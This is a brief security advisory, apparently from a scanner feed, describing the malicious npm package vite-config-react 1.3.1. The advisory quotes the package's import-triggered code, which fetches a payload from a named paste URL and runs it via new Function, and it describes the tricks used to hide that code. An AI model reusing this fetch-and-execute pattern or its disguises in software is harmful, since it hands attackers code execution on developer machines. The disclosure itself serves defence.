vite-config-react @1.3.1

Summary

On require / import of the package, the entrypoint chain src/index.js → core/createConfig.js → features/plugins.js side-effect-imports features/extras/config.js, which runs an IIFE that performs axios.get('https://www.jsonkeeper.com/b/AAON3', { headers: { 'x-secret-key': '_' } }) , reads .data.config from the response, and executes the returned string via new Function('require', s)(require) with a Node require constructed through createRequire(import.meta.url) . The fetch-and-eval is wrapped in a 5-attempt retry loop with a swallowed try/catch. The dropper additionally shadows the global process with a local object whose keys are renamed DEV_API_KEY , DEV_SECRET_KEY , DEV_SECRET_VALUE so the hardcoded URL and header read like ordinary environment-variable lookups, and the wrapper function is named getCallers to obscure intent. jsonkeeper.com is an anonymous, mutable paste host with no hash pinning — the operator can swap the executed payload at any time. Any project that imports this package (for example in vite.config.js ) hands the author arbitrary code execution on the developer's or CI machine with full require access.

Source: amazon-inspector (d1f9ee389e1023034a78a4c268db5d48e016565f37b7fb6c514bf095b2dec552)